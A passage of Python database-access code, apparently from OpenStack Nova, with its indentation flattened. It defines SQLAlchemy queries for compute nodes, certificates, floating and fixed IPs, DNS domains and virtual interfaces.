service_ref.last_seen_up = timeutils.utcnow()
service_ref.update(values)
return service_ref
###################
def _compute_node_select(context, filters=None):
# NOTE(jaypipes): With the addition of the resource-providers database
# schema, inventory and allocation information for various resources
# on a compute node are to be migrated from the compute_nodes and
# instance_extra tables into the new inventories and allocations tables.
# During the time that this data migration is ongoing we need to allow
# the scheduler to essentially be blind to the underlying database
# schema changes. So, this query here returns three sets of resource
# attributes:
# - inv_memory_mb, inv_memory_mb_used, inv_memory_mb_reserved,
# inv_ram_allocation_ratio
# - inv_vcpus, inv_vcpus_used, inv_cpu_allocation_ratio
# - inv_local_gb, inv_local_gb_used, inv_disk_allocation_ratio
# These resource capacity/usage fields store the total and used values
# for those three resource classes that are currently store in similar
# fields in the compute_nodes table (e.g. memory_mb and memory_mb_used)
# The code that runs the online data migrations will be able to tell if
# the compute node has had its inventory information moved to the
# inventories table by checking for a non-None field value for the
# inv_memory_mb, inv_vcpus, and inv_disk_gb fields.
#
# The below SQLAlchemy code below produces the following SQL statement
# exactly:
#
# SELECT
# cn.*,
# ram_inv.total as inv_memory_mb,
# ram_inv.reserved as inv_memory_mb_reserved,
# ram_inv.allocation_ratio as inv_ram_allocation_ratio,
# ram_usage.used as inv_memory_mb_used,
# cpu_inv.total as inv_vcpus,
# cpu_inv.allocation_ratio as inv_cpu_allocation_ratio,
# cpu_usage.used as inv_vcpus_used,
# disk_inv.total as inv_local_gb,
# disk_inv.allocation_ratio as inv_disk_allocation_ratio,
# disk_usage.used as inv_local_gb_used
# FROM compute_nodes AS cn
# LEFT OUTER JOIN resource_providers AS rp
# ON cn.uuid = rp.uuid
# LEFT OUTER JOIN inventories AS ram_inv
# ON rp.id = ram_inv.resource_provider_id
# AND ram_inv.resource_class_id = :RAM_MB
# LEFT OUTER JOIN (
# SELECT resource_provider_id, SUM(used) as used
# FROM allocations
# WHERE resource_class_id = :RAM_MB
# GROUP BY resource_provider_id
# ) AS ram_usage
# ON ram_inv.resource_provider_id = ram_usage.resource_provider_id
# LEFT OUTER JOIN inventories AS cpu_inv
# ON rp.id = cpu_inv.resource_provider_id
# AND cpu_inv.resource_class_id = :VCPUS
# LEFT OUTER JOIN (
# SELECT resource_provider_id, SUM(used) as used
# FROM allocations
# WHERE resource_class_id = :VCPUS
# GROUP BY resource_provider_id
# ) AS cpu_usage
# ON cpu_inv.resource_provider_id = cpu_usage.resource_provider_id
# LEFT OUTER JOIN inventories AS disk_inv
# ON rp.id = disk_inv.resource_provider_id
# AND disk_inv.resource_class_id = :DISK_GB
# LEFT OUTER JOIN (
# SELECT resource_provider_id, SUM(used) as used
# FROM allocations
# WHERE resource_class_id = :DISK_GB
# GROUP BY resource_provider_id
# ) AS disk_usage
# ON disk_inv.resource_provider_id = disk_usage.resource_provider_id
# WHERE cn.deleted = 0;
if filters is None:
filters = {}
RAM_MB = fields.ResourceClass.index(fields.ResourceClass.MEMORY_MB)
VCPU = fields.ResourceClass.index(fields.ResourceClass.VCPU)
DISK_GB = fields.ResourceClass.index(fields.ResourceClass.DISK_GB)
cn_tbl = sa.alias(models.ComputeNode.__table__, name='cn')
rp_tbl = sa.alias(models.ResourceProvider.__table__, name='rp')
inv_tbl = models.Inventory.__table__
alloc_tbl = models.Allocation.__table__
ram_inv = sa.alias(inv_tbl, name='ram_inv')
cpu_inv = sa.alias(inv_tbl, name='cpu_inv')
disk_inv = sa.alias(inv_tbl, name='disk_inv')
ram_usage = sa.select([alloc_tbl.c.resource_provider_id,
sql.func.sum(alloc_tbl.c.used).label('used')])
ram_usage = ram_usage.where(alloc_tbl.c.resource_class_id == RAM_MB)
ram_usage = ram_usage.group_by(alloc_tbl.c.resource_provider_id)
ram_usage = sa.alias(ram_usage, name='ram_usage')
cpu_usage = sa.select([alloc_tbl.c.resource_provider_id,
sql.func.sum(alloc_tbl.c.used).label('used')])
cpu_usage = cpu_usage.where(alloc_tbl.c.resource_class_id == VCPU)
cpu_usage = cpu_usage.group_by(alloc_tbl.c.resource_provider_id)
cpu_usage = sa.alias(cpu_usage, name='cpu_usage')
disk_usage = sa.select([alloc_tbl.c.resource_provider_id,
sql.func.sum(alloc_tbl.c.used).label('used')])
disk_usage = disk_usage.where(alloc_tbl.c.resource_class_id == DISK_GB)
disk_usage = disk_usage.group_by(alloc_tbl.c.resource_provider_id)
disk_usage = sa.alias(disk_usage, name='disk_usage')
cn_rp_join = sql.outerjoin(
cn_tbl, rp_tbl,
cn_tbl.c.uuid == rp_tbl.c.uuid)
ram_inv_join = sql.outerjoin(
cn_rp_join, ram_inv,
sql.and_(rp_tbl.c.id == ram_inv.c.resource_provider_id,
ram_inv.c.resource_class_id == RAM_MB))
ram_join = sql.outerjoin(
ram_inv_join, ram_usage,
ram_inv.c.resource_provider_id == ram_usage.c.resource_provider_id)
cpu_inv_join = sql.outerjoin(
ram_join, cpu_inv,
sql.and_(rp_tbl.c.id == cpu_inv.c.resource_provider_id,
cpu_inv.c.resource_class_id == VCPU))
cpu_join = sql.outerjoin(
cpu_inv_join, cpu_usage,
cpu_inv.c.resource_provider_id == cpu_usage.c.resource_provider_id)
disk_inv_join = sql.outerjoin(
cpu_join, disk_inv,
sql.and_(rp_tbl.c.id == disk_inv.c.resource_provider_id,
disk_inv.c.resource_class_id == DISK_GB))
disk_join = sql.outerjoin(
disk_inv_join, disk_usage,
disk_inv.c.resource_provider_id == disk_usage.c.resource_provider_id)
# TODO(jaypipes): Remove all capacity and usage fields from this method
# entirely and deal with allocations and inventory information in a
# tabular fashion instead of a columnar fashion like the legacy
# compute_nodes table schema does.
inv_cols = [
ram_inv.c.total.label('inv_memory_mb'),
ram_inv.c.reserved.label('inv_memory_mb_reserved'),
ram_inv.c.allocation_ratio.label('inv_ram_allocation_ratio'),
ram_usage.c.used.label('inv_memory_mb_used'),
cpu_inv.c.total.label('inv_vcpus'),
cpu_inv.c.allocation_ratio.label('inv_cpu_allocation_ratio'),
cpu_usage.c.used.label('inv_vcpus_used'),
disk_inv.c.total.label('inv_local_gb'),
disk_inv.c.reserved.label('inv_local_gb_reserved'),
disk_inv.c.allocation_ratio.label('inv_disk_allocation_ratio'),
disk_usage.c.used.label('inv_local_gb_used'),
]
cols_in_output = list(cn_tbl.c)
cols_in_output.extend(inv_cols)
select = sa.select(cols_in_output).select_from(disk_join)
if context.read_deleted == "no":
select = select.where(cn_tbl.c.deleted == 0)
if "compute_id" in filters:
select = select.where(cn_tbl.c.id == filters["compute_id"])
if "service_id" in filters:
select = select.where(cn_tbl.c.service_id == filters["service_id"])
if "host" in filters:
select = select.where(cn_tbl.c.host == filters["host"])
if "hypervisor_hostname" in filters:
hyp_hostname = filters["hypervisor_hostname"]
select = select.where(cn_tbl.c.hypervisor_hostname == hyp_hostname)
engine = get_engine(context)
conn = engine.connect()
results = conn.execute(select).fetchall()
# Callers expect dict-like objects, not SQLAlchemy RowProxy objects...
results = [dict(r) for r in results]
conn.close()
return results
@pick_context_manager_reader
def compute_node_get(context, compute_id):
results = _compute_node_select(context, {"compute_id": compute_id})
if not results:
raise exception.ComputeHostNotFound(host=compute_id)
return results[0]
@pick_context_manager_reader
def compute_node_get_model(context, compute_id):
# TODO(edleafe): remove once the compute node resource provider migration
# is complete, and this distinction is no longer necessary.
result = model_query(context, models.ComputeNode).\
filter_by(id=compute_id).\
first()
if not result:
raise exception.ComputeHostNotFound(host=compute_id)
return result
@pick_context_manager_reader
def compute_nodes_get_by_service_id(context, service_id):
results = _compute_node_select(context, {"service_id": service_id})
if not results:
raise exception.ServiceNotFound(service_id=service_id)
return results
@pick_context_manager_reader
def compute_node_get_by_host_and_nodename(context, host, nodename):
results = _compute_node_select(context,
{"host": host, "hypervisor_hostname": nodename})
if not results:
raise exception.ComputeHostNotFound(host=host)
return results[0]
@pick_context_manager_reader_allow_async
def compute_node_get_all_by_host(context, host):
results = _compute_node_select(context, {"host": host})
if not results:
raise exception.ComputeHostNotFound(host=host)
return results
@pick_context_manager_reader
def compute_node_get_all(context):
return _compute_node_select(context)
@pick_context_manager_reader
def compute_node_search_by_hypervisor(context, hypervisor_match):
field = models.ComputeNode.hypervisor_hostname
return model_query(context, models.ComputeNode).\
filter(field.like('%%%s%%' % hypervisor_match)).\
all()
@pick_context_manager_writer
def compute_node_create(context, values):
"""Creates a new ComputeNode and populates the capacity fields
with the most recent data.
"""
convert_objects_related_datetimes(values)
compute_node_ref = models.ComputeNode()
compute_node_ref.update(values)
compute_node_ref.save(context.session)
return compute_node_ref
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@pick_context_manager_writer
def compute_node_update(context, compute_id, values):
"""Updates the ComputeNode record with the most recent data."""
compute_ref = compute_node_get_model(context, compute_id)
# Always update this, even if there's going to be no other
# changes in data. This ensures that we invalidate the
# scheduler cache of compute node data in case of races.
values['updated_at'] = timeutils.utcnow()
convert_objects_related_datetimes(values)
compute_ref.update(values)
return compute_ref
@pick_context_manager_writer
def compute_node_delete(context, compute_id):
"""Delete a ComputeNode record."""
result = model_query(context, models.ComputeNode).\
filter_by(id=compute_id).\
soft_delete(synchronize_session=False)
if not result:
raise exception.ComputeHostNotFound(host=compute_id)
@pick_context_manager_reader
def compute_node_statistics(context):
"""Compute statistics over all compute nodes."""
# TODO(sbauza): Remove the service_id filter in a later release
# once we are sure that all compute nodes report the host field
_filter = or_(models.Service.host == models.ComputeNode.host,
models.Service.id == models.ComputeNode.service_id)
result = model_query(context,
models.ComputeNode, (
func.count(models.ComputeNode.id),
func.sum(models.ComputeNode.vcpus),
func.sum(models.ComputeNode.memory_mb),
func.sum(models.ComputeNode.local_gb),
func.sum(models.ComputeNode.vcpus_used),
func.sum(models.ComputeNode.memory_mb_used),
func.sum(models.ComputeNode.local_gb_used),
func.sum(models.ComputeNode.free_ram_mb),
func.sum(models.ComputeNode.free_disk_gb),
func.sum(models.ComputeNode.current_workload),
func.sum(models.ComputeNode.running_vms),
func.sum(models.ComputeNode.disk_available_least),
), read_deleted="no").\
filter(models.Service.disabled == false()).\
filter(models.Service.binary == "nova-compute").\
filter(_filter).\
first()
# Build a dict of the info--making no assumptions about result
fields = ('count', 'vcpus', 'memory_mb', 'local_gb', 'vcpus_used',
'memory_mb_used', 'local_gb_used', 'free_ram_mb', 'free_disk_gb',
'current_workload', 'running_vms', 'disk_available_least')
return {field: int(result[idx] or 0)
for idx, field in enumerate(fields)}
###################
@main_context_manager.writer
def certificate_create(context, values):
certificate_ref = models.Certificate()
for (key, value) in values.items():
certificate_ref[key] = value
certificate_ref.save(context.session)
return certificate_ref
@main_context_manager.reader
def certificate_get_all_by_project(context, project_id):
return model_query(context, models.Certificate, read_deleted="no").\
filter_by(project_id=project_id).\
all()
@main_context_manager.reader
def certificate_get_all_by_user(context, user_id):
return model_query(context, models.Certificate, read_deleted="no").\
filter_by(user_id=user_id).\
all()
@main_context_manager.reader
def certificate_get_all_by_user_and_project(context, user_id, project_id):
return model_query(context, models.Certificate, read_deleted="no").\
filter_by(user_id=user_id).\
filter_by(project_id=project_id).\
all()
###################
@require_context
@main_context_manager.reader
def floating_ip_get(context, id):
try:
result = model_query(context, models.FloatingIp, project_only=True).\
filter_by(id=id).\
options(joinedload_all('fixed_ip.instance')).\
first()
if not result:
raise exception.FloatingIpNotFound(id=id)
except db_exc.DBError:
msg = _LW("Invalid floating IP ID %s in request") % id
LOG.warning(msg)
raise exception.InvalidID(id=id)
return result
@require_context
@main_context_manager.reader
def floating_ip_get_pools(context):
pools = []
for result in model_query(context, models.FloatingIp,
(models.FloatingIp.pool,)).distinct():
pools.append({'name': result[0]})
return pools
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True,
retry_on_request=True)
@main_context_manager.writer
def floating_ip_allocate_address(context, project_id, pool,
auto_assigned=False):
nova.context.authorize_project_context(context, project_id)
floating_ip_ref = model_query(context, models.FloatingIp,
read_deleted="no").\
filter_by(fixed_ip_id=None).\
filter_by(project_id=None).\
filter_by(pool=pool).\
first()
if not floating_ip_ref:
raise exception.NoMoreFloatingIps()
params = {'project_id': project_id, 'auto_assigned': auto_assigned}
rows_update = model_query(context, models.FloatingIp, read_deleted="no").\
filter_by(id=floating_ip_ref['id']).\
filter_by(fixed_ip_id=None).\
filter_by(project_id=None).\
filter_by(pool=pool).\
update(params, synchronize_session='evaluate')
if not rows_update:
LOG.debug('The row was updated in a concurrent transaction, '
'we will fetch another one')
raise db_exc.RetryRequest(exception.FloatingIpAllocateFailed())
return floating_ip_ref['address']
@require_context
@main_context_manager.writer
def floating_ip_bulk_create(context, ips, want_result=True):
try:
tab = models.FloatingIp().__table__
context.session.execute(tab.insert(), ips)
except db_exc.DBDuplicateEntry as e:
raise exception.FloatingIpExists(address=e.value)
if want_result:
return model_query(context, models.FloatingIp).filter(
models.FloatingIp.address.in_(
[ip['address'] for ip in ips])).all()
def _ip_range_splitter(ips, block_size=256):
"""Yields blocks of IPs no more than block_size elements long."""
out = []
count = 0
for ip in ips:
out.append(ip['address'])
count += 1
if count > block_size - 1:
yield out
out = []
count = 0
if out:
yield out
@require_context
@main_context_manager.writer
def floating_ip_bulk_destroy(context, ips):
project_id_to_quota_count = collections.defaultdict(int)
for ip_block in _ip_range_splitter(ips):
# Find any floating IPs that were not auto_assigned and
# thus need quota released.
query = model_query(context, models.FloatingIp).\
filter(models.FloatingIp.address.in_(ip_block)).\
filter_by(auto_assigned=False)
for row in query.all():
# The count is negative since we release quota by
# reserving negative quota.
project_id_to_quota_count[row['project_id']] -= 1
# Delete the floating IPs.
model_query(context, models.FloatingIp).\
filter(models.FloatingIp.address.in_(ip_block)).\
soft_delete(synchronize_session='fetch')
# Delete the quotas, if needed.
# Quota update happens in a separate transaction, so previous must have
# been committed first.
for project_id, count in project_id_to_quota_count.items():
try:
reservations = quota.QUOTAS.reserve(context,
project_id=project_id,
floating_ips=count)
quota.QUOTAS.commit(context, reservations, project_id=project_id)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Failed to update usages bulk "
"deallocating floating IP"))
@require_context
@main_context_manager.writer
def floating_ip_create(context, values):
floating_ip_ref = models.FloatingIp()
floating_ip_ref.update(values)
try:
floating_ip_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.FloatingIpExists(address=values['address'])
return floating_ip_ref
def _floating_ip_count_by_project(context, project_id):
nova.context.authorize_project_context(context, project_id)
# TODO(tr3buchet): why leave auto_assigned floating IPs out?
return model_query(context, models.FloatingIp, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(auto_assigned=False).\
count()
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@main_context_manager.writer
def floating_ip_fixed_ip_associate(context, floating_address,
fixed_address, host):
fixed_ip_ref = model_query(context, models.FixedIp).\
filter_by(address=fixed_address).\
options(joinedload('network')).\
first()
if not fixed_ip_ref:
raise exception.FixedIpNotFoundForAddress(address=fixed_address)
rows = model_query(context, models.FloatingIp).\
filter_by(address=floating_address).\
filter(models.FloatingIp.project_id ==
context.project_id).\
filter(or_(models.FloatingIp.fixed_ip_id ==
fixed_ip_ref['id'],
models.FloatingIp.fixed_ip_id.is_(None))).\
update({'fixed_ip_id': fixed_ip_ref['id'], 'host': host})
if not rows:
raise exception.FloatingIpAssociateFailed(address=floating_address)
return fixed_ip_ref
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@main_context_manager.writer
def floating_ip_deallocate(context, address):
return model_query(context, models.FloatingIp).\
filter_by(address=address).\
filter(and_(models.FloatingIp.project_id != null()),
models.FloatingIp.fixed_ip_id == null()).\
update({'project_id': None,
'host': None,
'auto_assigned': False},
synchronize_session=False)
@require_context
@main_context_manager.writer
def floating_ip_destroy(context, address):
model_query(context, models.FloatingIp).\
filter_by(address=address).\
delete()
@require_context
@main_context_manager.writer
def floating_ip_disassociate(context, address):
floating_ip_ref = model_query(context,
models.FloatingIp).\
filter_by(address=address).\
first()
if not floating_ip_ref:
raise exception.FloatingIpNotFoundForAddress(address=address)
fixed_ip_ref = model_query(context, models.FixedIp).\
filter_by(id=floating_ip_ref['fixed_ip_id']).\
options(joinedload('network')).\
first()
floating_ip_ref.fixed_ip_id = None
floating_ip_ref.host = None
return fixed_ip_ref
def _floating_ip_get_all(context):
return model_query(context, models.FloatingIp, read_deleted="no")
@main_context_manager.reader
def floating_ip_get_all(context):
floating_ip_refs = _floating_ip_get_all(context).\
options(joinedload('fixed_ip')).\
all()
if not floating_ip_refs:
raise exception.NoFloatingIpsDefined()
return floating_ip_refs
@main_context_manager.reader
def floating_ip_get_all_by_host(context, host):
floating_ip_refs = _floating_ip_get_all(context).\
filter_by(host=host).\
options(joinedload('fixed_ip')).\
all()
if not floating_ip_refs:
raise exception.FloatingIpNotFoundForHost(host=host)
return floating_ip_refs
@require_context
@main_context_manager.reader
def floating_ip_get_all_by_project(context, project_id):
nova.context.authorize_project_context(context, project_id)
# TODO(tr3buchet): why do we not want auto_assigned floating IPs here?
return _floating_ip_get_all(context).\
filter_by(project_id=project_id).\
filter_by(auto_assigned=False).\
options(joinedload_all('fixed_ip.instance')).\
all()
@require_context
@main_context_manager.reader
def floating_ip_get_by_address(context, address):
return _floating_ip_get_by_address(context, address)
def _floating_ip_get_by_address(context, address):
# if address string is empty explicitly set it to None
if not address:
address = None
try:
result = model_query(context, models.FloatingIp).\
filter_by(address=address).\
options(joinedload_all('fixed_ip.instance')).\
first()
if not result:
raise exception.FloatingIpNotFoundForAddress(address=address)
except db_exc.DBError:
msg = _("Invalid floating IP %s in request") % address
LOG.warning(msg)
raise exception.InvalidIpAddressError(msg)
# If the floating IP has a project ID set, check to make sure
# the non-admin user has access.
if result.project_id and nova.context.is_user_context(context):
nova.context.authorize_project_context(context, result.project_id)
return result
@require_context
@main_context_manager.reader
def floating_ip_get_by_fixed_address(context, fixed_address):
return model_query(context, models.FloatingIp).\
outerjoin(models.FixedIp,
models.FixedIp.id ==
models.FloatingIp.fixed_ip_id).\
filter(models.FixedIp.address == fixed_address).\
all()
@require_context
@main_context_manager.reader
def floating_ip_get_by_fixed_ip_id(context, fixed_ip_id):
return model_query(context, models.FloatingIp).\
filter_by(fixed_ip_id=fixed_ip_id).\
all()
@require_context
@main_context_manager.writer
def floating_ip_update(context, address, values):
float_ip_ref = _floating_ip_get_by_address(context, address)
float_ip_ref.update(values)
try:
float_ip_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.FloatingIpExists(address=values['address'])
return float_ip_ref
###################
@require_context
@main_context_manager.reader
def dnsdomain_get(context, fqdomain):
return model_query(context, models.DNSDomain, read_deleted="no").\
filter_by(domain=fqdomain).\
with_lockmode('update').\
first()
def _dnsdomain_get_or_create(context, fqdomain):
domain_ref = dnsdomain_get(context, fqdomain)
if not domain_ref:
dns_ref = models.DNSDomain()
dns_ref.update({'domain': fqdomain,
'availability_zone': None,
'project_id': None})
return dns_ref
return domain_ref
@main_context_manager.writer
def dnsdomain_register_for_zone(context, fqdomain, zone):
domain_ref = _dnsdomain_get_or_create(context, fqdomain)
domain_ref.scope = 'private'
domain_ref.availability_zone = zone
context.session.add(domain_ref)
@main_context_manager.writer
def dnsdomain_register_for_project(context, fqdomain, project):
domain_ref = _dnsdomain_get_or_create(context, fqdomain)
domain_ref.scope = 'public'
domain_ref.project_id = project
context.session.add(domain_ref)
@main_context_manager.writer
def dnsdomain_unregister(context, fqdomain):
model_query(context, models.DNSDomain).\
filter_by(domain=fqdomain).\
delete()
@main_context_manager.reader
def dnsdomain_get_all(context):
return model_query(context, models.DNSDomain, read_deleted="no").all()
###################
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True,
retry_on_request=True)
@main_context_manager.writer
def fixed_ip_associate(context, address, instance_uuid, network_id=None,
reserved=False, virtual_interface_id=None):
"""Keyword arguments:
reserved -- should be a boolean value(True or False), exact value will be
used to filter on the fixed IP address
"""
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
network_or_none = or_(models.FixedIp.network_id == network_id,
models.FixedIp.network_id == null())
fixed_ip_ref = model_query(context, models.FixedIp, read_deleted="no").\
filter(network_or_none).\
filter_by(reserved=reserved).\
filter_by(address=address).\
first()
if fixed_ip_ref is None:
raise exception.FixedIpNotFoundForNetwork(address=address,
network_uuid=network_id)
if fixed_ip_ref.instance_uuid:
raise exception.FixedIpAlreadyInUse(address=address,
instance_uuid=instance_uuid)
params = {'instance_uuid': instance_uuid,
'allocated': virtual_interface_id is not None}
if not fixed_ip_ref.network_id:
params['network_id'] = network_id
if virtual_interface_id:
params['virtual_interface_id'] = virtual_interface_id
rows_updated = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(id=fixed_ip_ref.id).\
filter(network_or_none).\
filter_by(reserved=reserved).\
filter_by(address=address).\
update(params, synchronize_session='evaluate')
if not rows_updated:
LOG.debug('The row was updated in a concurrent transaction, '
'we will fetch another row')
raise db_exc.RetryRequest(
exception.FixedIpAssociateFailed(net=network_id))
return fixed_ip_ref
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True,
retry_on_request=True)
@main_context_manager.writer
def fixed_ip_associate_pool(context, network_id, instance_uuid=None,
host=None, virtual_interface_id=None):
"""allocate a fixed ip out of a fixed ip network pool.
This allocates an unallocated fixed ip out of a specified
network. We sort by updated_at to hand out the oldest address in
the list.
"""
if instance_uuid and not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
network_or_none = or_(models.FixedIp.network_id == network_id,
models.FixedIp.network_id == null())
fixed_ip_ref = model_query(context, models.FixedIp, read_deleted="no").\
filter(network_or_none).\
filter_by(reserved=False).\
filter_by(instance_uuid=None).\
filter_by(host=None).\
filter_by(leased=False).\
order_by(asc(models.FixedIp.updated_at)).\
first()
if not fixed_ip_ref:
raise exception.NoMoreFixedIps(net=network_id)
params = {'allocated': virtual_interface_id is not None}
if fixed_ip_ref['network_id'] is None:
params['network_id'] = network_id
if instance_uuid:
params['instance_uuid'] = instance_uuid
if host:
params['host'] = host
if virtual_interface_id:
params['virtual_interface_id'] = virtual_interface_id
rows_updated = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(id=fixed_ip_ref['id']).\
filter_by(network_id=fixed_ip_ref['network_id']).\
filter_by(reserved=False).\
filter_by(instance_uuid=None).\
filter_by(host=None).\
filter_by(leased=False).\
filter_by(address=fixed_ip_ref['address']).\
update(params, synchronize_session='evaluate')
if not rows_updated:
LOG.debug('The row was updated in a concurrent transaction, '
'we will fetch another row')
raise db_exc.RetryRequest(
exception.FixedIpAssociateFailed(net=network_id))
return fixed_ip_ref
@require_context
@main_context_manager.writer
def fixed_ip_create(context, values):
fixed_ip_ref = models.FixedIp()
fixed_ip_ref.update(values)
try:
fixed_ip_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.FixedIpExists(address=values['address'])
return fixed_ip_ref
@require_context
@main_context_manager.writer
def fixed_ip_bulk_create(context, ips):
try:
tab = models.FixedIp.__table__
context.session.execute(tab.insert(), ips)
except db_exc.DBDuplicateEntry as e:
raise exception.FixedIpExists(address=e.value)
@require_context
@main_context_manager.writer
def fixed_ip_disassociate(context, address):
_fixed_ip_get_by_address(context, address).update(
{'instance_uuid': None,
'virtual_interface_id': None})
@main_context_manager.writer
def fixed_ip_disassociate_all_by_timeout(context, host, time):
# NOTE(vish): only update fixed ips that "belong" to this
# host; i.e. the network host or the instance
# host matches. Two queries necessary because
# join with update doesn't work.
host_filter = or_(and_(models.Instance.host == host,
models.Network.multi_host == true()),
models.Network.host == host)
result = model_query(context, models.FixedIp, (models.FixedIp.id,),
read_deleted="no").\
filter(models.FixedIp.allocated == false()).\
filter(models.FixedIp.updated_at < time).\
join((models.Network,
models.Network.id == models.FixedIp.network_id)).\
join((models.Instance,
models.Instance.uuid == models.FixedIp.instance_uuid)).\
filter(host_filter).\
all()
fixed_ip_ids = [fip[0] for fip in result]
if not fixed_ip_ids:
return 0
result = model_query(context, models.FixedIp).\
filter(models.FixedIp.id.in_(fixed_ip_ids)).\
update({'instance_uuid': None,
'leased': False,
'updated_at': timeutils.utcnow()},
synchronize_session='fetch')
return result
@require_context
@main_context_manager.reader
def fixed_ip_get(context, id, get_network=False):
query = model_query(context, models.FixedIp).filter_by(id=id)
if get_network:
query = query.options(joinedload('network'))
result = query.first()
if not result:
raise exception.FixedIpNotFound(id=id)
# FIXME(sirp): shouldn't we just use project_only here to restrict the
# results?
if (nova.context.is_user_context(context) and
result['instance_uuid'] is not None):
instance = instance_get_by_uuid(context.elevated(read_deleted='yes'),
result['instance_uuid'])
nova.context.authorize_project_context(context, instance.project_id)
return result
@main_context_manager.reader
def fixed_ip_get_all(context):
result = model_query(context, models.FixedIp, read_deleted="yes").all()
if not result:
raise exception.NoFixedIpsDefined()
return result
@require_context
@main_context_manager.reader
def fixed_ip_get_by_address(context, address, columns_to_join=None):
return _fixed_ip_get_by_address(context, address,
columns_to_join=columns_to_join)
def _fixed_ip_get_by_address(context, address, columns_to_join=None):
if columns_to_join is None:
columns_to_join = []
try:
result = model_query(context, models.FixedIp)
for column in columns_to_join:
result = result.options(joinedload_all(column))
result = result.filter_by(address=address).first()
if not result:
raise exception.FixedIpNotFoundForAddress(address=address)
except db_exc.DBError:
msg = _("Invalid fixed IP Address %s in request") % address
LOG.warning(msg)
raise exception.FixedIpInvalid(msg)
# NOTE(sirp): shouldn't we just use project_only here to restrict the
# results?
if (nova.context.is_user_context(context) and
result['instance_uuid'] is not None):
instance = _instance_get_by_uuid(
context.elevated(read_deleted='yes'),
result['instance_uuid'])
nova.context.authorize_project_context(context,
instance.project_id)
return result
@require_context
@main_context_manager.reader
def fixed_ip_get_by_floating_address(context, floating_address):
return model_query(context, models.FixedIp).\
join(models.FloatingIp,
models.FloatingIp.fixed_ip_id ==
models.FixedIp.id).\
filter(models.FloatingIp.address == floating_address).\
first()
# NOTE(tr3buchet) please don't invent an exception here, None is fine
@require_context
@main_context_manager.reader
def fixed_ip_get_by_instance(context, instance_uuid):
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
vif_and = and_(models.VirtualInterface.id ==
models.FixedIp.virtual_interface_id,
models.VirtualInterface.deleted == 0)
result = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(instance_uuid=instance_uuid).\
outerjoin(models.VirtualInterface, vif_and).\
options(contains_eager("virtual_interface")).\
options(joinedload('network')).\
options(joinedload('floating_ips')).\
order_by(asc(models.VirtualInterface.created_at),
asc(models.VirtualInterface.id)).\
all()
if not result:
raise exception.FixedIpNotFoundForInstance(instance_uuid=instance_uuid)
return result
@main_context_manager.reader
def fixed_ip_get_by_host(context, host):
instance_uuids = _instance_get_all_uuids_by_host(context, host)
if not instance_uuids:
return []
return model_query(context, models.FixedIp).\
filter(models.FixedIp.instance_uuid.in_(instance_uuids)).\
all()
@require_context
@main_context_manager.reader
def fixed_ip_get_by_network_host(context, network_id, host):
result = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(network_id=network_id).\
filter_by(host=host).\
first()
if not result:
raise exception.FixedIpNotFoundForNetworkHost(network_id=network_id,
host=host)
return result
@require_context
@main_context_manager.reader
def fixed_ips_by_virtual_interface(context, vif_id):
result = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(virtual_interface_id=vif_id).\
options(joinedload('network')).\
options(joinedload('floating_ips')).\
all()
return result
@require_context
@main_context_manager.writer
def fixed_ip_update(context, address, values):
_fixed_ip_get_by_address(context, address).update(values)
def _fixed_ip_count_by_project(context, project_id):
nova.context.authorize_project_context(context, project_id)
return model_query(context, models.FixedIp, (models.FixedIp.id,),
read_deleted="no").\
join((models.Instance,
models.Instance.uuid == models.FixedIp.instance_uuid)).\
filter(models.Instance.project_id == project_id).\
count()
###################
@require_context
@pick_context_manager_writer
def virtual_interface_create(context, values):
"""Create a new virtual interface record in the database.
:param values: = dict containing column values
"""
try:
vif_ref = models.VirtualInterface()
vif_ref.update(values)
vif_ref.save(context.session)
except db_exc.DBError:
raise exception.VirtualInterfaceCreateException()
return vif_ref
def _virtual_interface_query(context):
return model_query(context, models.VirtualInterface, read_deleted="no")
@require_context
@pick_context_manager_reader
def virtual_interface_get(context, vif_id):
"""Gets a virtual interface from the table.
:param vif_id: = id of the virtual interface
"""
vif_ref = _virtual_interface_query(context).\
filter_by(id=vif_id).\
first()
return vif_ref
@require_context
@pick_context_manager_reader
def virtual_interface_get_by_address(context, address):
"""Gets a virtual interface from the table.
:param address: = the address of the interface you're looking to get
"""
try:
vif_ref = _virtual_interface_query(context).\
filter_by(address=address).\
first()
except db_exc.DBError:
msg = _("Invalid virtual interface address %s in request") % address
LOG.warning(msg)
raise exception.InvalidIpAddressError(msg)
return vif_ref
@require_context
@pick_context_manager_reader
def virtual_interface_get_by_uuid(context, vif_uuid):
"""Gets a virtual interface from the table.
:param vif_uuid: the uuid of the interface you're looking to get
"""
vif_ref = _virtual_interface_query(context).\
filter_by(uuid=vif_uuid).\
first()
return vif_ref
@require_context
@require_instance_exists_using_uuid
@pick_context_manager_reader_allow_async
def virtual_interface_get_by_instance(context, instance_uuid):
"""Gets all virtual interfaces for instance.
:param instance_uuid: = uuid of the instance to retrieve vifs for
"""
vif_refs = _virtual_interface_query(context).\
filter_by(instance_uuid=instance_uuid).\
order_by(asc("created_at"), asc("id")).\
all()
return vif_refs
@require_context
@pick_context_manager_reader
def virtual_interface_get_by_instance_and_network(context, instance_uuid,
network_id):
"""Gets virtual interface for instance that's associated with network."""
vif_ref = _virtual_interface_query(context).\
filter_by(instance_uuid=instance_uuid).\
filter_by(network_id=network_id).\
first()
return vif_ref
@require_context
@pick_context_manager_writer
